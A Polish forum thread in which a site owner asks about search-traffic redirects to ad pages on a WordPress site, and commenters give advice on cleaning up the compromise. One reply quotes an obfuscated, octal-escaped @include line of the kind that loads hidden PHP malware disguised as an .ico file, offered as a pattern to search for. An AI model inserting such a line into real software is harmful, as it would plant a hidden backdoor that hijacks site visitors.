Wpis z mikrobloga

Mirki, spotkał się ktoś z podobnym problemem?
Czasami po wejściu na stronę z wyników wyszukiwania Google, lub z linku Google moja firma przekierowuje mnie na jakieś strony reklamowe (pic). Po kliknięciu wstecz, a następnie ponownym kliknięciu w link przekierowuje mnie na prawidłowy adres.
Strona jest postawiona na Wordpressie, ale mam również inną stronę na Drupalu i efekt jest podobny. Problem występuje zarówno na komputerze jak i na telefonie (iOS z Safari)
Ma ktoś jakąś radę na to?
#oszukujo #reklamy #chrome #wordpress
mkmk200 - Mirki, spotkał się ktoś z podobnym problemem?
Czasami po wejściu na stronę...

źródło: comment_rKsq0sgprXamMrA00vH3fCNLqHT2DUmS.jpg

Pobierz
  • 14
@mkmk200: Tak jak napisał @Ryonnen, zacząłbym od wywalenia wszystkiego poza katalogiem wp-content i wp-config.php, przeszukać dokładnie zawartości katalogów i plików (warto przeszukać na frazę "eval" ale nie tylko to). Usuń nieużywane motywy i wtyczki, poszukaj plików php w wp-content/uploads, pozmieniaj hasła do bazy, sprawdź wp-config.php czy coś się nie dopisało.
Na koniec wgraj czystą instalkę wordpressa (poza /wp-content), zmień hasło do wordpressa i ftp.
@beeras: dosyć hardkorowo podszedłeś do tematu (ʘʘ)
Ogólnie to szukaj linijek kodu typu:

/*61e7f*/

@include "\057/\167p\055i\156c\154u\144e\163/\152s\057.\0653\067c\061c\0719\056i\143o";

/*61e7f*/

Plików typu .ico z nazwami typu .563c5699.ico, jakieś dziwne pliki .php
@Ryonnen: @beeras: @MattheV: usunąłem już kilka niepotrzebnych wtyczek oraz w głównym katalogu było parę plików php nieznanego pochodzenia, zobaczymy czy problem będzie dalej występował
Na chwilę obecną dzięki wielkie! :)